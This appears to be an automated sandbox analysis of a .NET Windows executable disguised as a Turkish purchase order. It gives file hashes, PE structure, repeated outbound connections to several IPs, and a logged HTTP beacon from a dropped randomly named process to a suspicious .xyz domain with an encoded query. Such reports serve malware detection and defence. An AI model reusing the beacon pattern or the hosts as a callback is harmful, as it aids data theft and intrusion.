                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.953736498801867
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Windows Screen Saver (13104/52) 0.07%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      File name:03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
                                                      File size:1'015'808 bytes
                                                      MD5:860575aa9868349d8cbdbe70d45098c5
                                                      SHA1:6d4f34011c4a7f06ee54a15b091e0566fc38ac78
                                                      SHA256:88fcbe786b16f3cbb9292ed742d3e284d1936b20e4567cd0318effefd61fc176
                                                      SHA512:554779fae0b140dff014a0856d01b0fa5700330f41173fbb61a1294a5972d00bdf7a56998480e57e2efa0f0bb5c9c204d75521d2d15129c5aa2478e87f101d59
                                                      SSDEEP:24576:60oTr/lDZA+eo3eYbM0T9ICEUzY7A3HCrU:6nrNDXeqeLNCEU06iI
                                                      TLSH:042523551371CB11C97E93FA60B221450772EC2D29B5FA1E8E86B0EB34F2B809595F2B
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...F7................0......f.......6... ...@....@.. ....................................@................................
                                                      Icon Hash:66666667e69c310e
                                                      Entrypoint:0x4f36fa
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0xDAD73746 [Mon May 6 15:31:18 2086 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf36a8 | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf4000 | 0x6400 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xfc000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xf1988 | 0x70 | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xf1700 | 0xf1800 | dec21d39f434ee8ba72424a0e3dc78a2 | False | 0.9728028354684265 | data | 7.979735073551513 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xf4000 | 0x6400 | 0x6400 | 7627b067b0a8708eca27b1cd5faf9501 | False | 0.3955078125 | data | 5.1481094651783925 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xfc000 | 0xc | 0x200 | 0d192a879050354fbc29c623cf877b05 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0xf41e0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | | | 0.2701612903225806 |
| RT_ICON | 0xf44d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | | | 0.4966216216216216 |
| RT_ICON | 0xf4610 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.5439765458422174 |
| RT_ICON | 0xf54c8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | | | 0.6656137184115524 |
| RT_ICON | 0xf5d80 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | | | 0.5021676300578035 |
| RT_ICON | 0xf62f8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | | | 0.3157676348547718 |
| RT_ICON | 0xf88b0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | | | 0.4090056285178236 |
| RT_ICON | 0xf9968 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | | | 0.5859929078014184 |
| RT_GROUP_ICON | 0xf9de0 | 0x76 | data | | | 0.6440677966101694 |
| RT_VERSION | 0xf9e68 | 0x398 | OpenPGP Public Key | | | 0.4217391304347826 |
| RT_MANIFEST | 0xfa210 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                      Jul 3, 2024 17:45:39.387346029 CEST804975823.227.38.74192.168.2.4
                                                      Jul 3, 2024 17:45:39.387418985 CEST4975880192.168.2.423.227.38.74
                                                      Jul 3, 2024 17:45:39.389699936 CEST4975880192.168.2.423.227.38.74
                                                      Jul 3, 2024 17:45:39.394937992 CEST804975823.227.38.74192.168.2.4
                                                      Jul 3, 2024 17:45:39.906347036 CEST804975823.227.38.74192.168.2.4
                                                      Jul 3, 2024 17:45:39.906388998 CEST804975823.227.38.74192.168.2.4
                                                      Jul 3, 2024 17:45:39.907974958 CEST804975823.227.38.74192.168.2.4
                                                      Jul 3, 2024 17:45:39.908200979 CEST4975880192.168.2.423.227.38.74
                                                      Jul 3, 2024 17:45:39.911051989 CEST4975880192.168.2.423.227.38.74
                                                      Jul 3, 2024 17:45:39.915818930 CEST804975823.227.38.74192.168.2.4
                                                      Jul 3, 2024 17:45:44.949389935 CEST4975980192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:44.954360008 CEST8049759172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:44.954444885 CEST4975980192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:44.956773043 CEST4975980192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:44.961585045 CEST8049759172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:45.629235983 CEST8049759172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:45.630120039 CEST8049759172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:45.630177021 CEST4975980192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:46.471883059 CEST4975980192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:47.490521908 CEST4976080192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:47.496897936 CEST8049760172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:47.497040987 CEST4976080192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:47.499368906 CEST4976080192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:47.505572081 CEST8049760172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:48.166023016 CEST8049760172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:48.167119980 CEST8049760172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:48.167242050 CEST4976080192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:49.003206015 CEST4976080192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:50.025677919 CEST4976180192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:50.030996084 CEST8049761172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:50.034511089 CEST4976180192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:50.037710905 CEST4976180192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:50.047689915 CEST8049761172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:50.047714949 CEST8049761172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:50.047724962 CEST8049761172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:50.047734976 CEST8049761172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:50.047786951 CEST8049761172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:50.047802925 CEST8049761172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:50.047895908 CEST8049761172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:50.047923088 CEST8049761172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:50.047933102 CEST8049761172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:50.714649916 CEST8049761172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:50.716134071 CEST8049761172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:50.717772007 CEST4976180192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:51.551482916 CEST4976180192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:52.569675922 CEST4976280192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:52.574790955 CEST8049762172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:52.574872971 CEST4976280192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:52.577670097 CEST4976280192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:52.582509995 CEST8049762172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:53.264507055 CEST8049762172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:53.264951944 CEST8049762172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:53.265005112 CEST4976280192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:53.265054941 CEST8049762172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:53.265115023 CEST4976280192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:53.269566059 CEST4976280192.168.2.4172.67.137.15
                                                      Jul 3, 2024 17:45:53.274360895 CEST8049762172.67.137.15192.168.2.4
                                                      Jul 3, 2024 17:45:58.377696037 CEST4976380192.168.2.446.30.211.38
                                                      Jul 3, 2024 17:45:58.383423090 CEST804976346.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:45:58.386399031 CEST4976380192.168.2.446.30.211.38
                                                      Jul 3, 2024 17:45:58.405688047 CEST4976380192.168.2.446.30.211.38
                                                      Jul 3, 2024 17:45:58.410558939 CEST804976346.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:45:59.050770044 CEST804976346.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:45:59.053306103 CEST804976346.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:45:59.053370953 CEST4976380192.168.2.446.30.211.38
                                                      Jul 3, 2024 17:45:59.925225973 CEST4976380192.168.2.446.30.211.38
                                                      Jul 3, 2024 17:46:00.945084095 CEST4976480192.168.2.446.30.211.38
                                                      Jul 3, 2024 17:46:00.950103045 CEST804976446.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:00.950187922 CEST4976480192.168.2.446.30.211.38
                                                      Jul 3, 2024 17:46:00.952377081 CEST4976480192.168.2.446.30.211.38
                                                      Jul 3, 2024 17:46:00.968827963 CEST804976446.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:01.591476917 CEST804976446.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:01.591598034 CEST804976446.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:01.591650963 CEST4976480192.168.2.446.30.211.38
                                                      Jul 3, 2024 17:46:02.457722902 CEST4976480192.168.2.446.30.211.38
                                                      Jul 3, 2024 17:46:03.475034952 CEST4976580192.168.2.446.30.211.38
                                                      Jul 3, 2024 17:46:03.479928017 CEST804976546.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:03.480021000 CEST4976580192.168.2.446.30.211.38
                                                      Jul 3, 2024 17:46:03.482319117 CEST4976580192.168.2.446.30.211.38
                                                      Jul 3, 2024 17:46:03.487334013 CEST804976546.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:03.487382889 CEST804976546.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:03.487415075 CEST804976546.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:03.487425089 CEST804976546.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:03.487432957 CEST804976546.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:03.487447977 CEST804976546.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:03.487458944 CEST804976546.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:03.487468004 CEST804976546.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:03.487509966 CEST804976546.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:04.111865044 CEST804976546.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:04.112039089 CEST804976546.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:04.112096071 CEST4976580192.168.2.446.30.211.38
                                                      Jul 3, 2024 17:46:04.987535954 CEST4976580192.168.2.446.30.211.38
                                                      Jul 3, 2024 17:46:06.010561943 CEST4976680192.168.2.446.30.211.38
                                                      Jul 3, 2024 17:46:06.015449047 CEST804976646.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:06.015526056 CEST4976680192.168.2.446.30.211.38
                                                      Jul 3, 2024 17:46:06.017992020 CEST4976680192.168.2.446.30.211.38
                                                      Jul 3, 2024 17:46:06.022819996 CEST804976646.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:06.659269094 CEST804976646.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:06.659568071 CEST804976646.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:06.659614086 CEST4976680192.168.2.446.30.211.38
                                                      Jul 3, 2024 17:46:06.662700891 CEST4976680192.168.2.446.30.211.38
                                                      Jul 3, 2024 17:46:06.667428970 CEST804976646.30.211.38192.168.2.4
                                                      Jul 3, 2024 17:46:11.698610067 CEST4976780192.168.2.4217.160.0.87
                                                      Jul 3, 2024 17:46:11.703490019 CEST8049767217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:11.703911066 CEST4976780192.168.2.4217.160.0.87
                                                      Jul 3, 2024 17:46:11.707701921 CEST4976780192.168.2.4217.160.0.87
                                                      Jul 3, 2024 17:46:11.712529898 CEST8049767217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:12.345635891 CEST8049767217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:12.345735073 CEST8049767217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:12.345786095 CEST4976780192.168.2.4217.160.0.87
                                                      Jul 3, 2024 17:46:13.221915960 CEST4976780192.168.2.4217.160.0.87
                                                      Jul 3, 2024 17:46:14.241436005 CEST4976880192.168.2.4217.160.0.87
                                                      Jul 3, 2024 17:46:14.249995947 CEST8049768217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:14.250077963 CEST4976880192.168.2.4217.160.0.87
                                                      Jul 3, 2024 17:46:14.252979040 CEST4976880192.168.2.4217.160.0.87
                                                      Jul 3, 2024 17:46:14.258131027 CEST8049768217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:14.895241022 CEST8049768217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:14.895354033 CEST8049768217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:14.895409107 CEST4976880192.168.2.4217.160.0.87
                                                      Jul 3, 2024 17:46:15.768841982 CEST4976880192.168.2.4217.160.0.87
                                                      Jul 3, 2024 17:46:16.787523031 CEST4976980192.168.2.4217.160.0.87
                                                      Jul 3, 2024 17:46:16.792382002 CEST8049769217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:16.792490005 CEST4976980192.168.2.4217.160.0.87
                                                      Jul 3, 2024 17:46:16.794879913 CEST4976980192.168.2.4217.160.0.87
                                                      Jul 3, 2024 17:46:16.799705029 CEST8049769217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:16.799729109 CEST8049769217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:16.799745083 CEST8049769217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:16.799753904 CEST8049769217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:16.799779892 CEST8049769217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:16.799866915 CEST8049769217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:16.799875975 CEST8049769217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:16.799906015 CEST8049769217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:16.799915075 CEST8049769217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:17.549436092 CEST8049769217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:17.549472094 CEST8049769217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:17.549593925 CEST4976980192.168.2.4217.160.0.87
                                                      Jul 3, 2024 17:46:18.300060034 CEST4976980192.168.2.4217.160.0.87
                                                      Jul 3, 2024 17:46:19.319050074 CEST4977080192.168.2.4217.160.0.87
                                                      Jul 3, 2024 17:46:19.328032970 CEST8049770217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:19.328221083 CEST4977080192.168.2.4217.160.0.87
                                                      Jul 3, 2024 17:46:19.333043098 CEST4977080192.168.2.4217.160.0.87
                                                      Jul 3, 2024 17:46:19.338004112 CEST8049770217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:19.975766897 CEST8049770217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:19.976249933 CEST8049770217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:19.976305008 CEST4977080192.168.2.4217.160.0.87
                                                      Jul 3, 2024 17:46:19.978811026 CEST4977080192.168.2.4217.160.0.87
                                                      Jul 3, 2024 17:46:19.983670950 CEST8049770217.160.0.87192.168.2.4
                                                      Jul 3, 2024 17:46:25.071800947 CEST4977180192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:25.076869011 CEST804977184.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:25.076958895 CEST4977180192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:25.079884052 CEST4977180192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:25.084841967 CEST804977184.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:25.547918081 CEST804977184.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:25.547987938 CEST4977180192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:26.581342936 CEST4977180192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:26.586579084 CEST804977184.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:27.817744970 CEST4977280192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:28.148478985 CEST804977284.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:28.148607016 CEST4977280192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:28.227508068 CEST4977280192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:28.232530117 CEST804977284.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:28.617588997 CEST804977284.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:28.617731094 CEST4977280192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:29.737657070 CEST4977280192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:29.771718025 CEST804977284.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:30.767218113 CEST4977380192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:30.772115946 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:30.772222042 CEST4977380192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:30.811510086 CEST4977380192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:30.816379070 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:30.816469908 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:30.816492081 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:30.816519976 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:30.816529036 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:30.816562891 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:30.816571951 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:30.816607952 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:30.816617012 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:31.413727999 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:31.416780949 CEST4977380192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:32.331306934 CEST4977380192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:32.336113930 CEST804977384.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.350130081 CEST4977480192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:33.355101109 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.355958939 CEST4977480192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:33.361753941 CEST4977480192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:33.370079041 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812366009 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812411070 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812423944 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812434912 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812447071 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812458992 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812470913 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812493086 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812587976 CEST4977480192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:33.812587976 CEST4977480192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:33.812706947 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812721968 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:33.812812090 CEST4977480192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:33.817722082 CEST4977480192.168.2.484.32.84.32
                                                      Jul 3, 2024 17:46:33.822921038 CEST804977484.32.84.32192.168.2.4
                                                      Jul 3, 2024 17:46:39.225827932 CEST4977580192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:39.230624914 CEST804977538.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:39.231245041 CEST4977580192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:39.233753920 CEST4977580192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:39.238770962 CEST804977538.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:40.123665094 CEST804977538.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:40.126621962 CEST804977538.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:40.126672029 CEST4977580192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:40.737574100 CEST4977580192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:41.756134987 CEST4977680192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:41.763585091 CEST804977638.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:41.765846968 CEST4977680192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:41.769730091 CEST4977680192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:41.774575949 CEST804977638.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:42.890132904 CEST804977638.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:42.890209913 CEST804977638.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:42.890259981 CEST4977680192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:42.890474081 CEST804977638.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:42.890515089 CEST4977680192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:43.268841028 CEST4977680192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:44.288501024 CEST4977780192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:44.293500900 CEST804977738.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:44.293582916 CEST4977780192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:44.296518087 CEST4977780192.168.2.438.47.232.233
                                                      Jul 3, 2024 17:46:44.301512957 CEST804977738.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:44.301527023 CEST804977738.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:44.301538944 CEST804977738.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:44.301547050 CEST804977738.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:44.301619053 CEST804977738.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:44.301661968 CEST804977738.47.232.233192.168.2.4
                                                      Jul 3, 2024 17:46:44.301773071 CEST804977738.47.232.233192.168.2.4
                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      0 | 192.168.2.4 | 49742 | 38.150.29.6 | 80 | 3716 | C:\Program Files (x86)\dBFhdyqBsdNrnrJAfNLOKXKaQnhKQJBcldNsIfNpUQtMCDpaQGBzTrWGWqXfCiiJiSX\akwoJPEqdiyPQmCnaGzo.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jul 3, 2024 17:44:09.534791946 CEST | 419 | OUT | GET /a24j/?lxRlvTSh=RsceReT900EWT/dwsr4j9O4BlXzkLceVZQ7aWeUSP6prvEVffZLEO15AIWxlHKHabVj2I55FGLI5L0C49uGheAnDVqmJ9AiU0eI6N3YkeR21zvyMSZqsHmQ=&kh=9PxLvhoHS4 HTTP/1.1
                                                      Host: www.qdfake525pm.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:44:10.802591085 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx/1.26.0
                                                      Date: Wed, 03 Jul 2024 15:46:43 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 2001
                                                      Connection: close
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Not Found</title><style type="text/css">* {margin:0;padding:0;}body {background-color:#EFEFEF;font: .9em "Lucida Sans Unicode", "Lucida Grande", sans-serif;}#wrapper{width:600px;margin:40px auto 0;text-align:center;-moz-box-shadow: 5px 5px 10px rgba(0,0,0,0.3);-webkit-box-shadow: 5px 5px 10px rgba(0,0,0,0.3);box-shadow: 5px 5px 10px rgba(0,0,0,0.3);}#wrapper h1{color:#FFF;text-align:center;margin-bottom:20px;}#wrapper a{display:block;font-size:.9em;padding-top:20px;color:#FFF;text-decoration:none;text-align:center;}#container {width:600px;padding-bottom:15px;background-color:#FFFFFF;}.navtop{height:40px;background-color:#24B2EB;padding:13px;}.content {padding:10px 10px 25px;bac [TRUNCATED]
                                                      Jul 3, 2024 17:44:10.802763939 CEST | 931 | IN |
                                                      Data Ascii: button{color:white;padding:15px 20px;text-shadow:1px 1px 0 #00A5FF;font-weight:bold;text-align:center;border:1px solid #24B2EB;margin:0px 200px;clear:both;background-color: #24B2EB;border-radiu


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
